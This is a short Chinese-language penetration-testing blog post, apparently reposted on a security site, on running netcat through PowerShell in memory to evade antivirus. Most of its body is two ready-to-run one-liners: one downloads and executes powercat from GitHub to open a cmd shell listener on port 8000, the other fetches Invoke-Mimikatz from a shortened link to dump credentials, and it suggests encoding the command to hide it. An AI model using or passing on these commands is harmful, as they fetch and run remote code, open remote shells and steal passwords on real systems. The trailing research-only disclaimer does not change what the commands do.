powershell运行netcat

admin 2022年4月1日11:23:03评论110 views字数 525阅读1分45秒阅读模式

前言


大家都知道,powershell可以做到在内存中加载运行文件,做到无文件在硬盘上生成。


正文


渗透中大家常用的技巧比如nc监听、mimikatz密码抓取等,今天给大家介绍下利用ps执行nc做到变相免杀。


ps版nc链接如下:


https://github.com/besimorhino/powercat


可以本地执行,也可以远程执行,远程执行命令如下:


powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -l -p 8000 -e cmd"


powershell运行netcat


然后远程连接执行命令即可

powershell运行netcat


当然,如果嫌弃该命令太暴露,可以对其进行编码


powershell运行netcat


mimikatz密码抓取同理


powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


原文始发于微信公众号(中国白客联盟):powershell运行netcat

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日11:23:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   powershell运行netcathttp://cn-sec.com/archives/783546.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息